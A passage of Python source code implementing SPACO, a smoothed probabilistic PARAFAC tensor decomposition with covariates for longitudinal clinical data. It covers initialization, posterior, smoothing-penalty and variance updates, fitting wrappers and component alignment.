self.Phi0 = None\n self.U0 = None\n self.G = None\n self.V = None\n self.Phi = None\n self.U = None\n self.h = None\n self.eps = eps\n def Vinit(self):\n idx = np.sum(1.0 - self.Omodes['O2'], axis=0)\n idx = np.where(idx == 0)[0]\n np.random.seed(self.random_state)\n KJ = self.K\n if(KJ > self.X.shape[2]):\n KJ = self.X.shape[2]\n if self.mod == \"pca\":\n tmp = self.Xmodes['X2'][:, idx]\n means = np.mean(tmp, axis=0)\n tmp = tmp - means\n tmp = np.linalg.svd(tmp)\n self.V0 = tmp[0][:, :KJ]\n else:\n self.V0 = np.random.normal(shape=(self.Xmodes['X2'].shape[0], KJ))\n for k in np.arange(KJ):\n self.V0[:, k] = self.V0[:, k] / np.sqrt(np.sum(self.V0[:, k] ** 2))\n def Phiinit(self):\n num_subject, num_unique_time, num_feature = self.X.shape\n np.random.seed(self.random_state)\n KT = self.K\n if(KT > num_unique_time):\n KT = num_unique_time\n if self.mod == \"pca\":\n W = np.zeros((num_subject, num_unique_time, KT))\n W[:] = np.nan\n for k in np.arange(KT):\n for t in np.arange(num_unique_time):\n W[:, t, k] = np.matmul(self.X[:, t, :], self.V0[:, k])\n Wtotal = {}\n for s in np.arange(num_unique_time):\n for t in np.arange(num_unique_time):\n if s <= t:\n Wtotal[(s, t)] = {}\n for i in np.arange(self.X.shape[0]):\n if self.O[i, t, 0] * self.O[i, s, 0] == 1:\n Wtotal[(s, t)][i] = np.sum(W[i, t, :] * W[i, s, :])\n for s in np.arange(num_unique_time):\n for t in np.arange(num_unique_time):\n if s <= t:\n if (s, t) in Wtotal.keys():\n if len(Wtotal[(s, t)]) == 0:\n Wtotal.pop((s, t))\n if self.h is None:\n self.h = num_unique_time / np.sqrt(len(Wtotal))\n W_smooth, self.Phi0, diags = FPCA_smooth(Wtotal, h=self.h,num_unique_time=num_unique_time, K=KT)\n else:\n self.Phi0 = np.random.normal((num_unique_time, KT))\n for k in np.arange(KT):\n self.Phi0[:, k] = self.Phi0[:, k] / np.sqrt(np.sum(self.Phi0[:, k] ** 2))\n def UGinit(self):\n #column order V1Phi1, V1Phi2,...,V1PhiK,..., VKPhi1,...VKPhiK\n self.Utmp = np.zeros((self.X.shape[0], self.Phi0.shape[1] * self.V0.shape[1]))\n self.G = np.zeros((self.K, self.Phi0.shape[1], self.V0.shape[1]))\n PhiV0 = np.kron(self.V0, self.Phi0)\n for i in np.arange(self.X.shape[0]):\n x0 = self.Xmodes['X1'][i, :]\n o0 = self.Omodes['O1'][i, :]\n o0 = np.where(o0 == 1)[0]\n PhiV01 = PhiV0[o0, :]\n x0 = x0[o0]\n A = np.matmul(np.transpose(PhiV01),PhiV01) + self.eps * np.identity(PhiV0.shape[1])\n a = np.matmul(np.transpose(PhiV01), x0)\n self.Utmp[i,:] = np.linalg.solve(A, a)\n np.random.seed(self.random_state)\n tmp = np.linalg.svd(self.Utmp)\n self.U0 = tmp[0][:,:self.K]\n # tmp: K * (K^2)\n tmp = np.matmul(np.transpose(self.U0), self.Utmp)\n for k in np.arange(self.K):\n for l in np.arange(self.V0.shape[1]):\n ll = np.arange((l*self.Phi0.shape[1]),(l+1)*self.Phi0.shape[1])\n self.G[k,:,l] = tmp[k,ll]\n def Gparafac(self):\n J = self.V0.shape[0]\n T = self.Phi0.shape[0]\n I = self.U0.shape[0]\n V = np.zeros((J, self.K))\n Phi = np.zeros((T, self.K))\n PhiV = np.zeros((J*T, self.K))\n Xhat = np.zeros((I, J*T))\n errorsG = np.zeros((2))\n np.random.seed(self.random_state)\n parafacG_svd = parafac(tensor= self.G, rank = self.K, n_iter_max=10000,\n init='svd', svd='numpy_svd',random_state=self.random_state)[1]\n ###calculate the reconstruction error\n for k in np.arange(self.K):\n V[:,k] = np.matmul(self.V0, parafacG_svd[2][:,k])\n Phi[:, k] = np.matmul(self.Phi0,parafacG_svd[1][:,k])\n PhiV[:,k] = np.kron(V[:, k].reshape((J, 1)),Phi[:, k].reshape((T, 1))).reshape(-1)\n U, Xhat = Uconstruct(X1 = self.Xmodes['X1'], O1 = self.Omodes['O1'], PhiV = PhiV, eps = self.eps)\n #Ghat = tl.cp_to_tensor(parafacG_svd)\n errorsG[0] = np.mean((self.Xmodes['X1'][self.Omodes['O1']==1]-Xhat[self.Omodes['O1']==1])**2)\n #random_num Random\n if self.random_num > 0:\n err_tmp = np.zeros(self.random_num)\n np.random.seed(self.random_state)\n seeds_rd = np.zeros(self.random_num, dtype = int)\n for l in np.arange(self.random_num):\n seeds_rd[l] = int(self.random_state+self.random_num)\n parafacG_rd_list = list()\n for l in np.arange(self.random_num):\n seed_everything(int(seeds_rd[l]))\n parafacG_rd = parafac(tensor= self.G, rank = self.K, n_iter_max=100,\n init='random', random_state =int(seeds_rd[l]))[1]\n ###calculate the reconstruction error\n for k in np.arange(self.K):\n V[:, k] = np.matmul(self.V0,parafacG_rd[2][:, k])\n Phi[:, k] = np.matmul(self.Phi0,parafacG_rd[1][:, k])\n PhiV[:, k] = np.kron(V[:, k].reshape((J, 1)),Phi[:, k].reshape((T, 1))).reshape(-1)\n U, Xhat = Uconstruct(X1=self.Xmodes['X1'],O1=self.Omodes['O1'], PhiV=PhiV, eps=self.eps)\n err_tmp[l] = np.mean((self.Xmodes['X1'][self.Omodes['O1']==1]-Xhat[self.Omodes['O1']==1])**2)\n parafacG_rd_list.append(copy.deepcopy(parafacG_rd))\n errorsG[1] = np.min(err_tmp)\n parafacG_rd = parafacG_rd_list[np.argmin(err_tmp)]\n else:\n errorsG[1] = np.inf\n parafacG_rd = parafacG_svd\n # jen_num Jenrich\n if errorsG[1] < errorsG[0]:\n parafacG = parafacG_rd\n else:\n parafacG = parafacG_svd\n self.A = parafacG[0]\n self.B = parafacG[1]\n self.C = parafacG[2]\n def transform(self):\n J = self.V0.shape[0]\n T = self.Phi0.shape[0]\n I = self.U0.shape[0]\n self.PhiV = np.zeros((J * T, self.K))\n self.U = np.matmul(self.U0, self.A)\n self.Phi = np.matmul(self.Phi0, self.B)\n self.V = np.matmul(self.V0, self.C)\n for k in np.arange(self.K):\n a1 = np.sqrt(np.sum(self.Phi[:,k]**2))/self.phiNorm\n a2 = np.sqrt(np.sum(self.V[:, k] ** 2)) / self.vNorm\n self.Phi[:,k] = self.Phi[:,k]/a1\n self.V[:,k] = self.V[:,k]/a2\n self.PhiV[:, k] = np.kron(self.V[:, k].reshape((J, 1)),self.Phi[:, k].reshape((T, 1))).reshape(-1)\n U, Xhat = Uconstruct(X1=self.Xmodes['X1'],O1=self.Omodes['O1'],PhiV=self.PhiV, eps=self.eps)\n self.U = U.copy()\n self.X1hat = Xhat.copy()\n def varianceInit(self):\n self.s2 = np.mean(self.U**2, axis = 0)\n if self.homoNoise:\n self.sigma2[:] = np.sum((self.X1hat[self.Omodes['O1']==1] - self.Xmodes['X1'][self.Omodes['O1']==1])**2)/np.sum(self.Omodes['O1'])\n def run(self):\n self.Vinit()\n self.Phiinit()\n self.UGinit()\n self.Gparafac()\n self.transform()\n self.varianceInit()\n\n'''\nSPACO (Smoothed Probablistic PARAFAC with covariates)\n\nIn many clinical study, we can have subjects measured at different time points\nand are interested in identifying patient sub-clusters and covariates that are\nimportant in the clustering step.\n\n:argument\n@ X: I * T * J array time series array.\n@ O: I * T * J indicator array of whether an observation is available.\n@ Z: I * q covariate matrix\n@ K: rank\n@ Omega: M * M smooth penalty matrix\n@ H: M * M norm constraint matrix.\n@ Phi: T * K smooth principal components.\n@ V: J * K loadings for multivariate features.\n@ mu: I * K posterior means of the U matrix\n@ cov: I * K * K posterior covariance of the U matrix.\n@ beta: q * K coefficient matrix.\n@ sigmaF2: length-K vectors, variances for uk.\n@ sigma2: length-p vectors, variances for Xj.\n@ lambda1: lengthe K vector, smooth penalty.\n@ lambda2: length K vector, sparsity penalty.\n'''\nclass SPACO():\n def __init__(self, opts):\n self.X = opts['X']\n self.O = opts['O']\n self.Z = opts['Z']\n self.K = opts['K']\n self.Omega = opts['Omega']\n self.h = opts['h']\n self.Phi = opts['Phi']\n self.V = opts['V']\n self.mu = opts['mu']\n self.cov = opts['cov']\n self.beta = opts['beta']\n self.sigmaF = opts['sigmaF']\n self.sigma = opts['sigma']\n self.lambda1 = opts['lambda1']\n self.lambda2 = opts['lambda2']\n self.fit_intercept = opts[\"intercept\"]\n self.orthogonal = opts[\"orthogonal\"]\n self.num_subjects = self.X.shape[0]\n self.num_times = self.X.shape[1]\n self.num_features =self.X.shape[2]\n self.intercepts = np.zeros((self.K))\n self.intermediantes = {}\n self.intermediantes['Xmod1'], self.intermediantes['O1'],\\\n self.intermediantes['Xmod2'], self.intermediantes['O2'], \\\n self.intermediantes['Xmod3'], self.intermediantes['O3']\\\n = unfold(self.X, self.O)\n self.transform_mat= np.zeros((self.num_subjects, self.K, self.K))\n self.beta_folds = opts['beta_folds']\n self.foldid = opts['foldid']\n if self.foldid is None:\n self.foldid = as_null()\n self.transform_vec = np.zeros((self.num_subjects, self.K))\n self.lam1_update= opts['lam1_update']\n self.lam2_update= opts['lam2_update']\n self.nlam1 = opts['nlam1']\n self.nlam2 = opts['nlam2']\n self.dfmin = opts['dfmin']\n self.dfmax = opts['dfmax']\n self.intermediantes['lambda1s'] = None\n self.intermediantes['selected'] = None\n self.intermediantes['Phis'] =None\n self.lam1criterion = opts['extra_sd']\n self.homoNoise = opts['homoNoise']\n self.time_checks = np.sum(self.O[:, :, 0], axis=0)\n self.time_checks = np.where(self.time_checks>0)[0]\n def check_init(self):\n if self.Phi is None:\n self.Phi = np.random.normal((self.num_times, self.K))\n if self.h is None:\n self.h = self.num_times\n for k in np.arange(self.K):\n l2norm = np.sqrt(np.sum(self.Phi[:,k] ** 2)/self.h)\n self.Phi[:, k] = self.Phi[:, k]/l2norm\n if self.V is None:\n self.V = np.random.normal((self.num_features, self.K))\n for k in np.arange(self.K):\n l2norm = np.sqrt(np.sum(self.V[:,k] ** 2))\n self.V[:, k] = self.V[:, k]/l2norm\n if self.beta is None:\n if self.Z is not None:\n self.beta = np.zeros((self.Z.shape[1], self.K))\n if self.mu is None:\n self.mu = np.zeros((self.num_subjects, self.K))\n if self.cov is None:\n self.cov = np.zeros((self.num_subjects, self.K, self.K))\n if self.sigmaF is None:\n self.sigmaF = np.ones((self.K)) * 10**8\n if self.lambda1 is None:\n self.lambda1 = np.zeros((self.K))\n if self.lambda2 is None:\n self.lambda2 = np.zeros((self.K))\n if self.sigma is None:\n self.sigma = np.ones((self.num_features))\n #for j in np.arange(self.num_features):\n #x = self.intermediantes['Xmod2'][j,:]\n #self.sigma[j] = np.nanvar(x)\n if self.orthogonal is None:\n self.orthogonal = 2*np.sqrt(self.num_subjects)*np.log(self.num_subjects*self.num_times*self.num_subjects)\n def posteriorU(self, meanOnly = False):\n PhiV = np.zeros((self.num_times * self.num_features, self.K))\n # O(KTJ)\n s2 = np.zeros((self.num_times * self.num_features))\n for j in np.arange(self.num_features):\n ll = np.arange(j * self.num_times,\n (j + 1) * self.num_times)\n s2[ll] = self.sigma[j]\n for k in np.arange(self.K):\n PhiV[:, k] = np.kron(\n self.V[:, k].reshape(self.num_features, 1),\n self.Phi[:, k].reshape(\n (self.num_times, 1))).reshape(-1)\n # O(I(|ni|K^2+JT)\n for i in np.arange(self.num_subjects):\n xte0 = self.intermediantes['Xmod1'][i, :]\n obs0 = self.intermediantes['O1'][i, :]\n obs0 = np.where(obs0 == 1)[0]\n PhiV0 = PhiV[obs0, :]\n xte0 = xte0[obs0]\n s20 = s2[obs0]\n tmp1 = np.matmul(np.transpose(PhiV0) / s20,PhiV0)\n tmp2 = np.matmul(np.transpose(PhiV0),xte0 / s20)\n tmp3 = np.zeros((self.K))\n M = np.diag(1.0/self.sigmaF)\n tmp4 = tmp1 + M\n tmp4 = np.linalg.inv(tmp4)\n if not meanOnly:\n self.cov[i, :, :] = tmp4.copy()\n M = M - np.matmul(np.matmul(M, self.cov[i,:,:]), M)\n if self.Z is not None:\n tmp3 = np.matmul(self.Z[i,],self.beta) / self.sigmaF\n if self.fit_intercept:\n tmp3 = tmp3 + self.intercepts / self.sigmaF\n self.mu[i, :] = np.matmul(self.cov[i, :, :],tmp2 + tmp3)\n self.transform_mat[i,:, :] = M.copy()\n self.transform_vec[i,:] = np.matmul(np.matmul(tmp2, self.cov[i,:,:]),np.diag(1.0/self.sigmaF))\n def proximalPhi(self, x0, A, b, lam1, tol, max_iter):\n Alam = A + lam1 * self.Omega\n # proximal gradient descent with constraints Phi_k^THPhi_k = 1\n tmp = np.linalg.svd(Alam)[1]\n L = np.max(tmp)\n tol0 = tol / np.sqrt(self.num_times)\n phi0 = x0.copy()\n err0 = 2 * tol0\n it0 = 0\n max_iter0 = max_iter * 10\n while it0 < max_iter0 and err0 > tol0:\n phi = phi0 - 1.0 / L * (np.matmul(Alam, phi0) - b)\n phi = phi / np.sqrt(np.sum(phi ** 2) / self.num_times)\n err0 = np.sum((phi - phi0) ** 2)\n it0 += 1\n phi0 = phi.copy()\n return phi0\n ###version three: penalty\n def PhiUpdate(self, max_iter, tol):\n A0 = np.zeros((self.num_subjects * self.num_features, self.K))\n for k in np.arange(self.K):\n A0[:,k] =np.kron(self.V[:,k].reshape((self.num_features, 1)),\\\n self.mu[:,k].reshape((self.num_subjects, 1))).reshape(-1)\n s2 = np.zeros((self.num_subjects * self.num_features))\n for i in np.arange(self.num_subjects):\n ll = np.arange((i * self.num_features), (i+1)*self.num_features)\n s2[ll] = self.sigma.copy()\n cross0 = np.zeros((self.K, self.num_times))\n cross11 = np.zeros((self.K, self.K,self.num_times))\n cross12 = np.zeros((self.K, self.K, self.num_times))\n for k in np.arange(self.K):\n for t in np.arange(self.num_times):\n x0 = self.intermediantes['Xmod3'][t,:]\n x1 = A0[:,k]\n obs0 = np.where(self.intermediantes['O3'][t,:]==1)[0]\n cross0[k,t] = np.sum(x0[obs0] * x1[obs0]/s2[obs0])\n for l in np.arange(self.K):\n if l <= k:\n x0 = self.mu[:,k]\n x1 = self.mu[:,l]\n x3 = self.cov[:,k,l]\n x4 = self.V[:,k]\n x5 = self.V[:,l]\n obs1 = np.where(self.O[:, t, 0] == 1)[0]\n cross11[k,l,t] = np.sum(x0[obs1] * x1[obs1])\n cross12[k,l,t] = np.sum(x3[obs1])\n cross11[k,l,t] *= np.sum(x4 * x5/self.sigma)\n cross12[k, l, t] *= np.sum(x4 * x5 / self.sigma)\n cross11[l,k,t] = cross11[k,l,t]\n cross12[l, k, t] = cross12[k, l, t]\n # O(KITJ)\n Phi = self.Phi.copy()\n Phi_ = Phi.copy()\n it = 0; max_iter = max_iter\n tol = tol; err = 2*tol\n A1 = np.zeros((self.num_times, self.num_times, self.K))\n for k in np.arange(self.K):\n for t in np.arange(self.num_times):\n A1[t, t, k] = cross11[k, k, t] + cross12[k, k, t]\n if self.lam1_update:\n ##generate candidate\n self.intermediantes['lambda1s'] = np.zeros(\n (self.nlam1, self.K))\n self.intermediantes['selected'] = np.zeros(\n (self.K))\n self.intermediantes['Phis'] = np.zeros(\n (self.num_times, self.nlam1, self.K))\n lam1s = np.zeros((self.nlam1, self.K))\n dfs = self.dfmin + (1.0 - np.arange(self.nlam1) / (\n self.nlam1 - 1.0)) * (self.dfmax - 1.0)\n for k in np.arange(self.K):\n for l in np.arange(self.nlam1):\n df_hat, lam1s[l,k] = penalty_search(A1[:,:,k], self.Omega,\n df0=dfs[l],\n tol=1e-4,max_iter=100)\n while it < max_iter and err > tol:\n for k in np.arange(self.K):\n A2 = np.zeros((self.num_times, self.num_times))\n b = np.zeros((self.num_times))\n for l in np.arange(self.K):\n if l != k:\n b -= (cross11[k, l, :] + cross12[k,l,:]) * Phi[:, l]\n A2 += self.orthogonal * np.matmul(\n Phi[:, l].reshape((self.num_times, 1)),\n Phi[:, l].reshape((1, self.num_times)))\n b += cross0[k, :]\n A1diag = np.diag(A1[:,:,k])\n phi_best = b.copy()\n for t in self.time_checks:\n phi_best[t] = phi_best[t]/A1diag[t]\n if self.lam1_update:\n ##generate candidate\n fittedPhik = np.zeros((self.num_times,self.nlam1))\n errors = np.zeros((self.num_times, self.nlam1))\n for l in np.arange(self.nlam1):\n #consider the unconstrained version and A2 = 0,\n # which is a normal ridge regression problem\n phi = self.proximalPhi(self.Phi[:,k], A1[:,:,k]+A2, b, lam1s[l,k], tol,max_iter)\n fittedPhik[:,l] = phi.copy()\n phi0 = np.linalg.solve(A1[:,:,k]+lam1s[l,k] * self.Omega, b)\n H = np.matmul(np.linalg.inv(A1[:,:,k]+lam1s[l,k]*self.Omega), A1[:,:,k])\n for t in self.time_checks:\n errors[t,l] = (phi0[t] - phi_best[t])**2/(1.0 - H[t,t])**2\n errors_mean = np.mean(errors,axis = 0)\n errors_sd = np.sqrt(np.var(errors,axis = 0)/self.num_times)\n c = np.min(errors_mean + errors_sd * self.lam1criterion)\n self.intermediantes['Phis'][:,:,k] = fittedPhik.copy()\n idx = np.where(errors_mean<=c)[0]\n idx = np.max(idx)\n self.lambda1[k] = lam1s[idx,k]\n self.intermediantes['selected'][k] = idx\n self.intermediantes['lambda1s'][:,k] = lam1s[:,k].copy()\n Phi[:,k] = fittedPhik[:,idx].copy()\n else:\n Phi[:,k] = self.proximalPhi(self.Phi[:,k], A1[:,:,k]+A2, b, self.lambda1[k], tol,max_iter)\n it = it + 1\n err = np.sum((Phi_ - Phi) ** 2)\n Phi_ = Phi.copy()\n delta = np.sum((Phi_- self.Phi)**2)\n self.Phi = Phi_.copy()\n return delta\n def Vupdate(self, max_iter = 20,tol=1e-2):\n #precalculation of large matrices used\n A0 = np.zeros((self.num_subjects * self.num_times, self.K))\n for k in np.arange(self.K):\n A0[:,k] = np.kron(self.Phi[:,k].reshape((self.num_times, 1)),\n self.mu[:,k].reshape((self.num_subjects, 1))).reshape(-1)\n cross0 = np.zeros((self.K, self.num_features))\n cross1 = np.zeros((self.K, self.K, self.num_features))\n for k in np.arange(self.K):\n for j in np.arange(self.num_features):\n x0 = self.intermediantes['Xmod2'][j,:]\n x1 = A0[:,k]\n obs0 = np.where(self.intermediantes['O2'][j, :] == 1)[0]\n cross0[k,j] = np.sum(x0[obs0] * x1[obs0])/self.sigma[j]\n for l in np.arange(self.K):\n if l <= k:\n x0 = A0[:, k]\n x1 = A0[:, l]\n x3 = self.cov[:,k,l]\n cross1[k,l,j] = np.sum(x0[obs0] * x1[obs0])\n for t in np.arange(self.num_times):\n ii = np.arange(self.num_subjects)[self.O[:,t,j]==1]\n cross1[k,l,j] += np.sum(x3[ii] * self.Phi[t,k] * self.Phi[t,l])\n cross1[l,k,j] = cross1[k,l,j]\n cross1[:,:,j] = cross1[:,:,j]/self.sigma[j]\n it = 0; max_iter = max_iter\n tol = tol; err = 2*tol\n V = self.V.copy()\n V_ = V.copy()\n while it < max_iter and err > tol:\n for k in np.arange(self.K):\n A = cross1[k,k,:]\n b = np.zeros((self.num_features))\n for l in np.arange(self.K):\n if l != k:\n b -= cross1[k,l,:] * self.V[:,l]\n b += cross0[k,:]\n # proximal gradient descent with constraints Phi_k^THPhi_k = 1\n L = np.max(A) * 2\n tol0 = tol/np.sqrt(self.num_features)\n v0 = self.V[:, k].copy()\n err0 = 2 * tol0\n it0 = 0\n max_iter0 = max_iter * 10\n while it0 < max_iter0 and err0 > tol0:\n v = v0 - 1.0/L * (v0 * A - b)\n v = v/np.sqrt(np.sum(v**2))\n err0 = np.sum((v - v0)**2)\n it0 += 1\n v0 = v.copy()\n V[:,k] = v0.copy()\n it = it + 1\n err = np.sum((V_ - V)**2)\n V_ = V.copy()\n delta = np.sum((V_- self.V)**2)\n self.V = V_.copy()\n return delta\n def betaUpdate(self):\n self.beta, self.intercepts, self.lambda2 = beta_fit(Z = self.Z, transform_mat = self.transform_mat,\n transform_vec = self.transform_vec, beta = self.beta,\n intercepts = self.intercepts, lambda2 = self.lambda2, fit_intercept=self.fit_intercept,\n lam2_update=self.lam2_update, nlam2=self.nlam2, nfolds=self.beta_folds, foldid = self.foldid,\n max_iter=1, tol=0.01)\n def sigmaUpdate(self):\n sigma = np.zeros((self.num_features))\n A0 = np.zeros((self.num_subjects * self.num_times, self.K))\n A1 = np.zeros((self.K, self.K))\n for k in np.arange(self.K):\n A0[:,k] = np.kron(self.mu[:,k].reshape((self.num_subjects,1)),\\\n self.Phi[:,k].reshape((self.num_times,1))).reshape(-1)\n obs0 = np.where(self.intermediantes['O2'][0, :]==1)[0]\n for k in np.arange(self.K):\n for l in np.arange(self.K):\n if l <= self.K:\n A1[k,l] = np.sum(A0[obs0,k] * A0[obs0,l])\n x1 = self.cov[:,k,l]\n for t in np.arange(self.num_times):\n ii = np.arange(self.num_subjects)[self.O[:, t, 0] == 1]\n A1[k, l] += np.sum(x1[ii] * self.Phi[t, k] * self.Phi[t, l])\n A1[l, k] = A1[k,l]\n tmp1 = 0.0\n tmp2 = 0.0\n for j in np.arange(self.num_features):\n x = self.intermediantes['Xmod2'][j,:]\n x1 = np.matmul(A0, self.V[j,:])\n tmp = np.sum(np.matmul(self.V[j,].reshape((1,self.K)), A1) * self.V[j,:])\n tmp3 = (np.sum(x[obs0]**2) - 2 * np.sum(x[obs0] * x1[obs0]) + tmp)\n tmp4 = float(len(obs0))\n sigma[j] = tmp3/tmp4\n tmp1 += tmp3\n tmp2 += tmp4\n if self.homoNoise:\n self.sigma[:] = tmp3/tmp4\n def sigmaFUpdate(self):\n sigmaF = np.zeros((self.K))\n fitted = np.zeros((self.num_subjects, self.K))\n if self.Z is not None:\n fitted = np.matmul(self.Z, self.beta)\n if self.fit_intercept:\n for k in np.arange(self.K):\n fitted[:,k] += self.intercepts[k]\n for i in np.arange(self.num_subjects):\n tmp = (self.mu[i, :] - fitted[i,:])\n sigmaF += tmp **2\n sigmaF += np.diag(self.cov[i,:,:])\n self.sigmaF = sigmaF / float(self.num_subjects)\n #self.sigmaF = np.var(self.mu - fitted, axis=0)\n\n'''\nWrapper for run SPACO with defined SPACO object\n'''\ndef SPACOfitSingle(self, max_iter, tol, nfolds0, max_iter0 = 5, trace = False,\n update_sigma = True, update_sigmaF = True, update_cov = True):\n err = 2 * tol\n it = 0;\n while it < max_iter and err > tol:\n if trace:\n print(\"iteration \"+str(it)+\" : \"+str(err))\n delta2 = self.PhiUpdate(max_iter=max_iter ,tol=tol / 10.0)\n delta1 = self.Vupdate(max_iter=max_iter, tol=tol/10.0)\n self.posteriorU(meanOnly=(not update_cov))\n if self.Z is not None:\n #update beta\n if not self.lam2_update:\n self.betaUpdate()\n else:\n beta, intercepts, lambda2 = beta_fit(Z = self.Z, transform_mat = self.transform_mat,\n transform_vec = self.transform_vec, beta = self.beta,\n intercepts = self.intercepts, lambda2 = self.lambda2,\n fit_intercept=self.fit_intercept,lam2_update=self.lam2_update,\n nlam2=self.nlam2, nfolds=nfolds0,max_iter=max_iter0, tol=tol/10)\n self.beta = beta.copy()\n self.intercepts = intercepts.copy()\n self.lambda2 = lambda2.copy()\n if update_sigma:\n self.sigmaUpdate()\n if update_sigmaF:\n self.sigmaFUpdate()\n err = delta1 + delta2\n it = it + 1\n return self\n\n'''\nWrapper for run SPACO starting from the input data.\n'''\ndef SPACOfit(X, Obs, T0, Z, K = 3, nfolds0 = 5,foldid=None, init_type = \"pca\", random_num = 20,\n nlambda0 = 20, lambda1 = None, lambda2 = None,\n lam1_update = True, nlam1 = 20, dfmin = 1, dfmax = 10, nlam2 = 100,\n kappa = 1e-2, orthogonal = 0, homoNoise = True,\n fit_intercept = True, demean = True, trace = False, extra_sd = 1.0,\n max_iter1 = 100, tol1 = 0.01, max_iter0 = 1, lam2_update = True,\n random_state = 0, lasso_maxit = 1e4, intercept_scale = 1e2):\n print(\"start data preparation:\")\n Omega, h, R, B0, cv, lams, dfs = \\\n prepare(X, Obs, T0, mean_removel=demean, nlam=nlambda0,\n lams=None, kappa=kappa)\n print(\"data preparation done.\")\n ###initialization\n print(\"start initialization:\")\n I = R.shape[0]; T = R.shape[1]; J = R.shape[2]\n initializer = initialization(X=R, OBS=Obs, T0=T0, K=K,eps=1.0 / np.sqrt(J * T),\n homoNoise = homoNoise, random_num= random_num,\n phiNorm = np.sqrt(h), vNorm= 1.0, random_state = random_state)\n initializer.run()\n print(\"initialization done.\")\n opts = {}\n opts['X'] = R; opts['O'] = Obs; opts['Z'] = Z; opts['K'] = K;\n opts['Omega'] = Omega; opts['h'] = h; opts['Phi'] = initializer.Phi.copy();\n opts['V'] = initializer.V.copy(); opts['mu'] = initializer.U.copy(); opts['cov'] = None;\n opts['beta'] = None; opts['intercept'] = None; opts['sigmaF'] = initializer.s2.copy(); opts['sigma'] = initializer.sigma2.copy();\n opts['lambda1'] = lambda1; opts['lambda2'] = lambda2; opts['fit_intercept'] = fit_intercept;\n opts['orthogonal'] = orthogonal; opts['lam1_update'] = lam1_update; opts['lam2_update'] = lam2_update;\n opts['nlam1'] = nlam1; opts['nlam2'] = nlam2; opts['dfmin'] = dfmin; opts['dfmax'] = dfmax;\n opts['extra_sd'] = extra_sd; opts['homoNoise'] = initializer.homoNoise;\n opts['beta_folds'] = nfolds0; opts['foldid'] = foldid\n self = SPACO(opts)\n self.check_init()\n self.posteriorU()\n if self.Z is not None and self.lam2_update:\n self.lambda2 = np.zeros((self.K))\n if self.fit_intercept:\n x = np.hstack([self.Z, np.ones((self.num_subjects, 1))])\n else:\n x = self.Z\n for k in np.arange(self.K):\n penalty_factor = np.ones(x.shape[1])\n if self.fit_intercept:\n penalty_factor[x.shape[1] - 1] = 0.0\n coefficients, lambda2min, cvm, cvsd, lambdas = my_cv_glmnet(x=x, y=self.mu[:,k],\n penalty_factor=penalty_factor,\n nlam=self.nlam2, nfolds=nfolds0)\n p0 = len(coefficients)\n if self.fit_intercept:\n self.intercepts[k] = coefficients[p0-1]\n p0 = p0-1\n self.lambda2[k] =lambda2min\n self.beta[:,k] = coefficients[:p0].copy()\n #initialization2\n tol_tmp= 1e-2\n err = 2 * tol_tmp\n sigmaF0 = self.sigmaF.copy()\n it = 0;\n max_iter_tmp = 10\n while err > tol_tmp and it < max_iter_tmp:\n if self.Z is not None:\n self.betaUpdate()\n self.sigmaFUpdate()\n self.sigmaUpdate()\n self.posteriorU()\n err = np.sum(np.abs(self.sigmaF - sigmaF0))\n sigmaF0 = self.sigmaF.copy()\n it += 1\n print(\"initialization done.\")\n self = SPACOfitSingle(self, max_iter = max_iter1, tol = tol1, max_iter0 = max_iter0, nfolds0=nfolds0, trace =trace)\n self.posteriorU()\n if self.Z is not None:\n self.betaUpdate()\n return self, R, B0, initializer\n\n\n\n\ndef cross_posterior(xte, ote, zte, s2, sigmaF, PhiV, beta = None, intercepts = None, fit_intercept = True):\n K = PhiV.shape[1]\n I = xte.shape[0]\n mu = np.zeros((I, K))\n cov = np.zeros((I, K, K))\n transform_mat = np.zeros((I, K, K))\n transform_vec =np.zeros((I, K))\n temp_vec = np.zeros((I, K))\n for i in np.arange(I):\n xte0 = xte[i, :]\n obs0 = ote[i,:]\n obs0 = np.where(obs0 == 1)[0]\n PhiV0 = PhiV[obs0, :]\n xte0 = xte0[obs0]\n s20 = s2[obs0]\n tmp1 = np.matmul(np.transpose(PhiV0) / s20, PhiV0)\n tmp2 = np.matmul(np.transpose(PhiV0), xte0 / s20)\n tmp3 = np.zeros((K))\n M = np.diag(1.0 / sigmaF)\n tmp4 = tmp1 + M\n tmp4 = np.linalg.inv(tmp4)\n cov[i, :, :] = tmp4.copy()\n M = M - np.matmul(np.matmul(M, cov[i, :, :]),M)\n if zte is not None:\n tmp3 = np.matmul(zte[i,],beta) / sigmaF\n if fit_intercept:\n tmp3 = tmp3 + intercepts / sigmaF\n mu[i, :] = np.matmul(cov[i, :, :], tmp2 + tmp3)\n transform_mat[i, :, :] = M.copy()\n transform_vec[i, :] = np.matmul(np.matmul(tmp2, cov[i, :, :]),np.diag(1.0 / sigmaF))\n temp_vec[i,:] = tmp2.copy()\n return mu, cov, transform_vec, transform_mat, temp_vec\n\ndef permutation_align_greedy(cross_fit_obj, cor_mat):\n orders = np.zeros(cross_fit_obj.K, dtype = int)\n columns = np.arange(cross_fit_obj.K)\n rows = np.arange(cross_fit_obj.K)\n abs_cor_mat = np.abs(cor_mat)\n idx_final = np.zeros(cross_fit_obj.K,dtype = int)\n for it in np.arange(cross_fit_obj.K):\n s1 = np.zeros(abs_cor_mat.shape[0])\n s2 = np.zeros(abs_cor_mat.shape[0])\n idx = np.zeros(abs_cor_mat.shape[0], dtype=int)\n for k in np.arange(abs_cor_mat.shape[1]):\n idx[k] = np.argmax(abs_cor_mat[:,k])\n s1[k] = abs_cor_mat[idx[k],k]\n if len(idx)>1:\n s2[k] = np.max(np.delete(abs_cor_mat[:,k],idx[k]))\n else:\n s2[k] = 0.0\n max_id = np.argmax(s1-s2)\n orders[columns[max_id]] = rows[idx[max_id]].copy()\n columns = np.delete(columns, max_id)\n rows = np.delete(rows, idx[max_id])\n abs_cor_mat = np.delete(abs_cor_mat, max_id, axis = 1)\n abs_cor_mat = np.delete(abs_cor_mat, idx[max_id],axis=0)\n signs = np.zeros(cross_fit_obj.K)\n for k in np.arange(cross_fit_obj.K):\n signs[k] = 1\n if cor_mat[orders[k], k] < 0:\n signs[k] = -1\n cross_fit_obj.V = cross_fit_obj.V[:,orders] * signs\n cross_fit_obj.Phi = cross_fit_obj.Phi[:,orders]\n cross_fit_obj.sigmaF = cross_fit_obj.sigmaF[orders]\n if cross_fit_obj.beta is not None:\n cross_fit_obj.beta =cross_fit_obj.beta[:,orders] * signs\n if cross_fit_obj.intercepts is not None:\n cross_fit_obj.intercepts = cross_fit_obj.intercepts[orders]*signs\n if cross_fit_obj.lambda2 is not None:\n cross_fit_obj.lambda2 =cross_fit_obj.lambda2[orders]\n 